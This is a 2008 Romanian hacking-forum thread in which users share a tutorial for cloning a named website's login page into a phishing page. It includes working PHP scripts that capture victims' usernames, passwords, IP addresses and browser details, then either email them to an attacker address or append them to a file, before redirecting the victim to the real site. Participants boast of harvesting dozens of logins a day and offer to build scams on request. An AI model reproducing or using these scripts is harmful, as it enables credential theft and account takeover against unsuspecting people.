MihaiAC Posted March 15, 2008 Report Posted March 15, 2008 Care imi raspunde si mie detaliat cum se fac scamurile? Am incercat o data... downloadand o pagina facuta de cineva si am modificat adresa de mail, dar nu inteleg unde trebuie sa se trimita pass-ul... daca se poate un tutorial video...p.s.: sunt n00b Quote
das392 Posted March 15, 2008 Report Posted March 15, 2008 By Nullbyte RSTZONE.ORGBuna, in ultima vreme m-am saturat sa tot vad pe diferite forumuri: Dati-mi si mie scam la X. Asa ca am decis sa scriu acest tutorial. In el veti invata cum va puteti face propriul scam la site-ul dorit. WARNING: Cei avansati sa nu ma ia cu ia uite-l si pe asta a descoperit Pamantul, este doar pentru cei care nu stiu . OK, deci mai intai ne alegem o tinta. Am ales http://doizece.neogen.ro/. Navigam pe site-ul ales. Apasam CTRL + S si salvam fisierul .html undeva pe computer. Il deschidem... Aici poate aparea o problema si anume calea la imagini. Daca este cale relativa (calea relativa este calea de genul /images/wow.gif) trebuie transformata in cale absoluta (http://tinta.com/images/wow.gif) Acum ca s-a clarificat, duce-ti-va in fisierul .html care a fost salvat, da-ti CTRL + F scrieti login... (aici cuvintele pot fi diferite.. incercati si parola, password, username etc. dak nu merge login). Veti avea un cod de genul <form action="login2.php">. Modificati login2.php in 040147.php! Acum, la Username, ar trebui sa fie un cod de genul <input type="text" name="email">. name="email" ne indica faptul ca, in scriptul PHP de autentificare, email este variabila ce tine numele de utilizator. Bun, o memoram. La password, codul ar trebui sa fie asemanator (<input type="password" name="password">). Deci, parola e tinuta in variabile password. O memoram si pe aceasta. Acum, acolo unde ati salvat .html-ul, creeati un fisier nou, numit 040147.php. In el, adaugati urmatorul cod: Cod: <?php $to = "skorpitz@gmail.com"; $name = $_POST['email']; $email = $_POST['email']; $subject = $_POST['subject']; $password = $_POST['password']; $agent = $_SERVER['HTTP_USER_AGENT']; $ip = $_SERVER['REMOTE_ADDR']; $d = date('l dS \of F Y h:i:s A'); $sub = "Cont nou DoiZece Hacked - $email"; $headers = "From: $name <$email>\n"; $headers .= "Content-Type: text/plain; charset=iso-8859-1\n"; $mes .= 'Username: '.$email."\n"; $mes .= "Parola: ".$password."\n"; $mes .= "Browser: ".$agent."\n"; $mes .= "IP: ".$ip."\n"; $mes .= 'Data si timpul: '.$d; { mail($to, $sub, $mes, $headers); header ("Location:http://doizece.neogen.ro/?1=1&dz_nl_m=login_reg&error=1&next_url=index.php%3F"); } ?> Modificati codul Cod: $to = "skorpitz@gmail.com"; i puneti mail-ul vostru. Codul de mai sus preia variabilele email si password si le trimite impreuna cu inca cateva detalii folositoare. Redenumiti .html-ul in index.html sau .php, uploada-ti cele 2 fisiere pe un host si distrati-va. Tutorial by NuLLByTe. e pe aici pe forum dar nu mai stiu pe undeil aveam eu copiatia incerca daca nu merge mai incerca odata Si daca nu merge nici atunciCred ca trebuie sa mai incerci inco data ! :wink: Quote
nullbyte Posted March 15, 2008 Report Posted March 15, 2008 http://rstcenter.com/forum/cum-sa-facem-o-pagina-de-phishing-la-orice-site-t8267.rstTrizore: mersi pentru interes Quote
das392 Posted March 15, 2008 Report Posted March 15, 2008 ma sunt curiosti-a venit vreun un login in mailu ala?poate ori fi chiar retardatiON:acum vroiam sa postez eu linku Quote
nullbyte Posted March 15, 2008 Report Posted March 15, 2008 ma sunt curiosti-a venit vreun un login in mailu ala?poate ori fi chiar retardatiON:acum vroiam sa postez eu linku Cand eram scamul on primeam peste 40 pe zi. Quote
MihaiAC Posted March 15, 2008 Author Report Posted March 15, 2008 ziceti-mi si mie un host free pls ( si bun ). Ce folositi voi de exemplu? dak folositi... Quote
AhEaD Posted March 15, 2008 Report Posted March 15, 2008 ziceti-mi si mie un host free pls ( si bun ). Ce folositi voi de exemplu? dak folositi...hosturi free cu functia mail() activata nu prea gasesti, dar totusi poti folosi un host free pentru un scam page si fara fuctia mail.<?php$name = $_POST['email'];$email = $_POST['email'];$d = date('l dS \of F Y h:i:s A'); $agent = $_SERVER['HTTP_USER_AGENT']; $ip = $_SERVER['REMOTE_ADDR']; $mes .= 'Username: '.$email."\n";$mes .= "Parola: ".$password."\n";$mes .= "Browser: ".$agent."\n";$mes .= "IP: ".$ip."\n";$mes .= 'Data si timpul: '.$d;$mes .= '----------------------------------';$fisier = "nume.txt";$fh = fopen($fisier, 'a');fwrite($fh, $mes);fclose($fh);header ("Location:http://pagina.de.redirect.com"); ?>Foloseste scriptul de mai sus ca 040147.php urmarind tutorialul lui nullbyte, btw, nu e testat dar ar trbuii sa mearga.Modifica (nume.txt) cu numele fisierului text unde vrei sa ti se salveze datele.Modifica (http://pagina.de.redirect.com) cu pagina unde sa fie re-directionat dupa ce complecteaza pagina de scam.BTW. chmod 777 nume.txt Quote
das392 Posted March 15, 2008 Report Posted March 15, 2008 puteai sa spui cine ma ajuta cu un scam de ....decat sa isi bata lumea capul cu tineil faceam eu repededami pm :arrow: Quote
